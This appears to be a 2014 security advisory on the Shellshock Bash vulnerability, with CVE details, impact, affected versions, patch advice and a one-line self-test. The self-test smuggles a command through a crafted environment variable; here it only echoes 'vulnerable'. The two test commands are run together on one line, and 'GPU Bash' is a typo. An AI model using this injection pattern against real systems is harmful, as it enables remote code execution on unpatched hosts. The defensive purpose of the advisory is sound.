Security experts expect the Bash Shellshock bug to have significant and widespread impact, potentially more devastating than Heartbleed.

On September 24, 2014, a vulnerability in Bash—now referred to as the ‘Shellshock’ bug—was publicly announced after its discovery last week by Stephane Chazelas. The original CVE (CVE-2014-6271) from NIST vulnerability database rates the severity of this vulnerability as a “10 out of 10” and provides the following description:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

Shortly after the original flaw in Bash went public a researcher found a similar flaw that wasn’t addressed by the first patch and it was assigned CVE-2014-7169.

Impact

The Shellshock Bash bug allows remote code execution, unauthorized disclosure of information, unauthorized modification, and disruption of service.

Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. The vulnerability arises from the fact that you can create environment variables with specially crafted values before calling the Bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents.

Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live.

Affected Versions of Bash

The vulnerability is present in GPU Bash up to and including versions 1.14 through 4.3.

You can check if you’re vulnerable by running the following lines in your default shell, which on many systems will be Bash. If you see the words “vulnerable”, then you’re at risk. If not, then either your Bash is fixed or your shell is using another interpreter.

		env X="() { :;} ; echo vulnerable" /bin/sh -c "echo completed"env X="() { :;} ; echo vulnerable " `which bash` -c "echo completed"	

At risk systems will contain “vulnerable” in the output after running commands.

Recommendations

Patch at risk systems to ensure no code can be executed after the end of a Bash function. Linux distributions, such as Red Hat and Fedora, are continuing to release guidance on patching the risk. Do not assume that a patch will completely remedy the issue because past patches have proved incomplete. Continue to monitor patch releases closely.

References

  1. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
  2. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
  3. https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  4. https://securityblog.redhat.com/2014/09/26/frequently-asked-questions-about-the-shellshock-bash-flaws/